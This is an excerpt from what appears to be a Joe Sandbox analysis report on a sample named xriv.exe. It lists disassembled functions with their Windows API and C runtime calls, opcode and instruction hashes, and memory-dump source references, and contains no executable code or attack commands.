                            • Instruction ID: e5a7d4241e8824616325a1df9825f4c20a47f79b7ba33fa1f167e2d9afc2ae18
                            • Opcode Fuzzy Hash: ad192d2fc295efd748d2ddd32e299c7ccce1dd4501a793dfe66375c97a2eed91
                            • Instruction Fuzzy Hash: 6A11A9722095162AD6313BFD9C84E2B25AE9FD277CB240279F229972D0DE3D8C454210
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(?,?,?,0137B7F5,0137DB7F,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137E0A0
                            • _free.LIBCMT ref: 0137E0FD
                            • _free.LIBCMT ref: 0137E133
                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137E13E
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 4e1b75f68602d6ae97b7eca66469c1b05d7a9faffbc1ba1ef6ef52e692e4560a
                            • Instruction ID: 93f1d2aec4b5a4b48ce1a0d15e34ceed3537abff0e8e67692824f55007da537b
                            • Opcode Fuzzy Hash: 4e1b75f68602d6ae97b7eca66469c1b05d7a9faffbc1ba1ef6ef52e692e4560a
                            • Instruction Fuzzy Hash: 4511DB722046266AD7322BBEEC85D6B25EE9BD277CF2502B5F128932E0DE7D8C414310
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0137E9E2,00000000,?,0138370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0137E893
                            • GetLastError.KERNEL32(?,0138370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0137E9E2,00000000,00000104,?), ref: 0137E89D
                            • __dosmaperr.LIBCMT ref: 0137E8A4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFullLastNamePath__dosmaperr
                            • String ID:
                            • API String ID: 2398240785-0
                            • Opcode ID: 9aeb25eebb9314328c116859eb67c9de0b2acb2cbffb8fa0ac7beb3188d6b0a7
                            • Instruction ID: 708d809778ca96d2ef4f79f462d03161da51c09aef89db0e6feda2e82095d14a
                            • Opcode Fuzzy Hash: 9aeb25eebb9314328c116859eb67c9de0b2acb2cbffb8fa0ac7beb3188d6b0a7
                            • Instruction Fuzzy Hash: 42F08132600116BBDB315FAAD80894BFFAEFF546A93044971F529C6510D735E811CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0137E9E2,00000000,?,01383695,00000000,00000000,0137E9E2,?,?,00000000,00000000,00000001), ref: 0137E8FC
                            • GetLastError.KERNEL32(?,01383695,00000000,00000000,0137E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0137E9E2,00000000,00000104), ref: 0137E906
                            • __dosmaperr.LIBCMT ref: 0137E90D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFullLastNamePath__dosmaperr
                            • String ID:
                            • API String ID: 2398240785-0
                            • Opcode ID: 7fa64038ddbc4ad8649a3f83cbc51c7b7cbdc25ff7ef448685a544ae3a75f916
                            • Instruction ID: 601833b2a6c70a65bd84c755ad4e8b623b022497439050e6e63e2682dad3ff88
                            • Opcode Fuzzy Hash: 7fa64038ddbc4ad8649a3f83cbc51c7b7cbdc25ff7ef448685a544ae3a75f916
                            • Instruction Fuzzy Hash: FBF06D3320021ABBDB711BAAC80894BFFADFF462A53044574F518C6510C739E821CBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WriteConsoleW.KERNEL32(01365140,0000000F,013968F8,00000000,01365140,?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140), ref: 013863A6
                            • GetLastError.KERNEL32(?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140,00000000,01365140,?,01383421,01365140), ref: 013863B2
                              • Part of subcall function 01386378: CloseHandle.KERNEL32(FFFFFFFE,013863C2,?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140,00000000,01365140), ref: 01386388
                            • ___initconout.LIBCMT ref: 013863C2
                              • Part of subcall function 0138633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01386369,01385A94,01365140,?,01382ECD,00000000,?,01365140,00000000), ref: 0138634D
                            • WriteConsoleW.KERNEL32(01365140,0000000F,013968F8,00000000,?,01385AA7,01365140,00000001,01365140,01365140,?,01382ECD,00000000,?,01365140,00000000), ref: 013863D7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: 528fd4dba02637a916a7ca7ff1513904d7ff432f9a8c8b8133f628a05e379dec
                            • Instruction ID: 31f7bf4024c890b7ce1ef8a6e379cb19c0fef2e67f2ea5c8951cfe8569556ec7
                            • Opcode Fuzzy Hash: 528fd4dba02637a916a7ca7ff1513904d7ff432f9a8c8b8133f628a05e379dec
                            • Instruction Fuzzy Hash: 29F03076400369BBCF322F99EC05A8E3F6AFB493A5F044420FA1895130D6728920EB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SleepConditionVariableCS.KERNELBASE(?,01377157,00000064), ref: 013771DD
                            • LeaveCriticalSection.KERNEL32(01399708,000000FF,?,01377157,00000064,?,?,?,01363E30,0139C468,774AE603,?,00000000,01388818,000000FF), ref: 013771E7
                            • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01377157,00000064,?,?,?,01363E30,0139C468,774AE603,?,00000000,01388818,000000FF), ref: 013771F8
                            • EnterCriticalSection.KERNEL32(01399708,?,01377157,00000064,?,?,?,01363E30,0139C468,774AE603,?,00000000,01388818,000000FF), ref: 013771FF
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                            • String ID:
                            • API String ID: 3269011525-0
                            • Opcode ID: eb27392a3b8bf70d6c506edb45f6bcde4a9747b938b205982d1558d394b907d6
                            • Instruction ID: c1a242d182f8c9eb82382057b9891f4f31d37f924b0541cbcab25565615cdb0b
                            • Opcode Fuzzy Hash: eb27392a3b8bf70d6c506edb45f6bcde4a9747b938b205982d1558d394b907d6
                            • Instruction Fuzzy Hash: 43E01235641228ABDF211F51EC09BDD3E5DFB09B6AF020028F50556114CF729900CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _free.LIBCMT ref: 0137C8C4
                              • Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
                              • Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B
                            • _free.LIBCMT ref: 0137C8D7
                            • _free.LIBCMT ref: 0137C8E8
                            • _free.LIBCMT ref: 0137C8F9
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 2fdd8ac631d872d0a8e59fddc68fbeea2763aad46e86c1651319c9d53b52ee88
                            • Instruction ID: be5d5e1ba8d879ee39e672971c8a2a5ecb9b8998aac5e3fb06255256540b6bfd
                            • Opcode Fuzzy Hash: 2fdd8ac631d872d0a8e59fddc68fbeea2763aad46e86c1651319c9d53b52ee88
                            • Instruction Fuzzy Hash: 54E0E6714001629ACF316F5AFD0198D3F6DEB94B2CB41414BE52923318EB3B05D5DF85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -
                            • API String ID: 0-2547889144
                            • Opcode ID: f7a106ac20b3469c9cce9cf40f3ddff02f36fca6da1a9bc411f9e56b26621c95
                            • Instruction ID: 90b256c2f8fc0e1c5bdad9192ca250b9507e3c4cce0910a50a34a9a63037fb09
                            • Opcode Fuzzy Hash: f7a106ac20b3469c9cce9cf40f3ddff02f36fca6da1a9bc411f9e56b26621c95
                            • Instruction Fuzzy Hash: BC2282B0D052599BEF25EB28CD497CDBBB56B6230CF5480E8C44927286DB751F88CF92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            • API String ID: 0-3702952914
                            • Opcode ID: e69751809c7756236469ddfb7fd6c7bd23c520755ee52b2fd01f79ca33269ffa
                            • Instruction ID: 8adaafa66ff01aac80ef0d941430b4df94c0b9a3dcdf3bf65cc0e7abb2933967
                            • Opcode Fuzzy Hash: e69751809c7756236469ddfb7fd6c7bd23c520755ee52b2fd01f79ca33269ffa
                            • Instruction Fuzzy Hash: 1741A671A0025AAFDB32DF9DDC80E9EBBFCEF95718F10006AE504E7240D6758A44CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01378FA2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: EncodePointer
                            • String ID: MOC$RCC
                            • API String ID: 2118026453-2084237596
                            • Opcode ID: a0846d687ea765f5557bdcdfa293875d625cc50a05e568409c726014d523b898
                            • Instruction ID: 7899b87a618694b90feedb964676a266c99fd3391bd73cb17f692f61f195bf91
                            • Opcode Fuzzy Hash: a0846d687ea765f5557bdcdfa293875d625cc50a05e568409c726014d523b898
                            • Instruction Fuzzy Hash: 73416A71900209AFDF26DF98DD84EEEBBB6FF48318F184199FA04A7211D3399950DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01372093
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileModuleName
                            • String ID: 5120$H
                            • API String ID: 514040917-2391956277
                            • Opcode ID: e0499fbd77cd672dc7a2a3f3a8f64cdd1d38e91cd7739e3bea39beed78697242
                            • Instruction ID: 58d5ac8bf937fcbde5f8549fefc3e784c9d9773825a2e7019e5eb4c5f3d242b9
                            • Opcode Fuzzy Hash: e0499fbd77cd672dc7a2a3f3a8f64cdd1d38e91cd7739e3bea39beed78697242
                            • Instruction Fuzzy Hash: 4B21BDB09003889BDB25EF2CC9467DD7FB8AB02308F5405DCD54967282D7794B498BE3
                            Uniqueness

                            Uniqueness Score: -1.00%